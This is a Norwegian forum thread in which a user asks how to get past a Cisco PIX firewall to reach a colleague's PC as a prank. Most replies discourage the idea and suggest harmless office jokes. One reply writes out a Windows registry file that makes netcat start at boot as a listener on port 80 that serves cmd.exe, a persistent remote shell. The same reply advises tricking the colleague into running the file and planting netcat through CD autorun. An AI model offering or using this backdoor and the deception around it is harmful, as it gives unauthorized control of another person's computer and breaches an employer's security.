Hvordan nå en pc som er bak en pix.

9 innlegg i emnet

Skrevet

Hei

En arbeid kollega sitter i samme nettverke som meg, bare at han har en pix i mellom maskin sin og nettverket.

Vi bruker å sitte å "kødde" med pcene til hverandre, men klarer ikke å gjøre det med hannes maskin, pga pix`n.

Hvordan er det mulig å nå maskinen hannes rundt pix`n?

Kent.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Lukter som en tråd som er på kant med retningslinjene for forumet det her.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Velkommen som medlem.

For alle de som ikke vet hva en PIX er (inkludert meg) legger jeg ved en link til Wikipedia - det er rett og slett en "boks" med firewall og security-funksjoner som også kan brukes mot internt nettverk, mens rutere stort sett bare filtrerer bort henvendelser "utenfra".

Temaet er temmelig sikkert for spesialisert for de fleste - hvordan man kommer seg forbi en PIX - så det har vel liten betydning om spørsmålet er "på kanten" uansett ? ... selve løsningen kan være aktuell for noen for security på internt og eksternt nettverk. PIX er forresten erstattet av nyere teknologi iflg. Wikipedia.

------

Det er stort sett ikke mulig å besvare "hvordan komme seg forbi" uten å ha en lik boks å teste på. Den tilbyr riktignok mange av de samme funksjonene som en ruter. I rutere trenger du IP-adresse og passord for å logge på - og innsikt i hvordan du setter opp en PC som "godkjent". Noen rutere bruker riktignok telnet-kommandoer istedenfor grafisk grensesnitt.

Søk på nettet +cisco +pix +manual (=treff på alle 3 ord) ga både manual og artikler, men nivået ble for "teknisk" for meg.

------

Dette er vel såpass kjent internt at det er vanskelig å lure folk også ?

Vi bruker å sitte å "kødde" med pcene til hverandre, men klarer ikke å gjøre det med hannes maskin, pga pix`n.

Med et FOR teknisk nivå på oppgaven er det vanskelig å bortforklare direkte forsøk som "kødding" - det er rett og slett for mye forberedelser. Nivået er nødt til å være enkelt for å bli godkjent som fleip. Overdreven fleip blir lett tatt alvorlig.

Folk har vel enklere områder som er mer egnet for fleip ? Vi hadde mye moro med lagersjefens telefon i et firma jeg jobbet - da noen andre hadde fått trådløs telefon.

Lot det ringe på kontoret hans inntil rett før han nådde frem når han var utenfor sammen med oss andre.

Han nådde telefonen nesten hver gang før vi la på. For ikke å være FOR opplagt lot vi det gå litt tid mellom hver ringing - vi lot ham få roe seg ned litt utenfor før neste telefon

Han "tok det" etter 3-4 ganger og skjønte at det var fleip fra noen, men det var moro de første gangene. :P

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Takk for forklaringen av pix ;-)

"Kødding" kan være bra om en bruker det fornuftig, for da får en testet ut løsningene i trygge miljø.

Alt er mulig, utfordirngen er å finne løsningen.

Svaret kan være å xxxxx som gir xxxxxxx

Hvordan det gjøres og rent praktis bør nok diskuteres mer i dybden på en tråd som ikke omhandler generelt nettverk.

Fordi slikt jeg tolker der, er en ute etter en program eller lignende for å bypass pix løsningen, noe kjapt og enkelt.

Det datatekniske aspekteret blir glemt å en lærer ikke av slikt.

Selv om slikt kan fristes om en har en kolega som brifer om noe som er bra å sikkert, så kan det være kjekt å motbevise det og det er fult mulig.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Jeg prøvde egentlig å styre ham bort fra denne typen fleip pga. komplisert nivå - og over på langt mer moderat fleip som er lettere å godta.

Om han ønsker det finnes det sikkert noen oppskrifter på nettet, men det er litt på kanten om JEG søker opp slike. Jeg forsøker å holde tråden innenfor et "akseptert nivå" og allikevel gi et noenlunde svar på det tekniske som også andre kan ha interesse av. Uten slik styring ville trolig tråden blitt stengt.

Link til Wikipedia var egentlig for å peile inn meg selv på hva dette er, men jeg legger ved slike linker hvis noen ønsker mer detaljert info enn den overfladiske beskrivelsen jeg gir.

------

Motivet her er å fleipe med en kollega - ikke å påvise sikkerhetshull eller om ting er mulig. Jeg droppet vel egentlig massevis av info siden nivået vanskelig kan forsvares som fleip.

Alternativ fleip som jeg nevnte var faktisk MORSOM og enkel, men ble selvfølgelig gjennomskuet fordi folk vanskelig klarte å holde seg alvorlig. Telefoner er langt kjappere og enklere enn PIX, og folk har allerede etablert et forhold til disse som gjør de egnet i en fleip (noen går jo ut av dusjen for å ta telefonen hvis den ringer).

"Offeret" har jo klart og tydelig "guarden oppe" på internt nettverk - så treff ham heller på en plass hvor han ikke er forberedt ?

Endret av Morten58
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Hvorfor ikke holde seg til gode gamle "køddestreker" som tape under musa, bytte om taster på tastaturet eller wunderbaum i PCMCIA-slotten? De går jo aldri ut på dato :)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Uhm. Jeg har brukt netcat til å styre pcer over nettverk hvor det har vært streng sikkerhet (uten "'über1337 hxx0r" hensikter). Du kan feks sette del til å lytte på tilkoblinger på port 80. Legge den til i autoexe eller i registeret for å få den til å starte opp.

Lagre denne koden som en .reg fil og få ham til å klikke på den.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"netcat"="C:\\windows\\system32\\netcat -L -d -p 80 -t -e cmd.exe"



[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]

"Installed"="1"


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]

"Installed"="1"

"NoChange"="1"


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]

"Installed"="1"

Så må du få lagt inn netcat.exe i hans system32 mappe. (Feks med autokjør på cd, bare å poppe den inn i cdromen ;)

Merk at dette er en SIKKELIG sikkerhetsbrist i bedriftens datasikkerhet, og bør ikke brukes ukritisk. netcat blir også tatt av de fleste antivirus (selv om netcat ikke gjør noe galt i seg selv).

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Uhm. Jeg har brukt netcat til å styre pcer over nettverk hvor det har vært streng sikkerhet

Da vil jeg gjerne vite hvordan du kommer forbi segmentering av nettverk både på switchport og vlan nivå. Så lenge du ikke driver arp poisoning så vil switchen kun sende trafikk til "intended party"..og med vlan vil du også få et eget broadcast domene + det faktum at klienter som er koblet opp på ulike switch porter med ulik vlan id , ikke kan kommunisere.

Endret av exchange
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Da vil jeg gjerne vite hvordan du kommer forbi segmentering av nettverk både på switchport og vlan nivå. Så lenge du ikke driver arp poisoning så vil switchen kun sende trafikk til "intended party"..og med vlan vil du også få et eget broadcast domene + det faktum at klienter som er koblet opp på ulike switch porter med ulik vlan id , ikke kan kommunisere.

Streng sikkerhet ble plutselig veldig relativt :lol:

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!


Start en konto

Logg inn

Har du allerede en konto? Logg inn her.


Logg inn nå

  • Hvem er aktive   0 medlemmer

    Ingen innloggede medlemmer aktive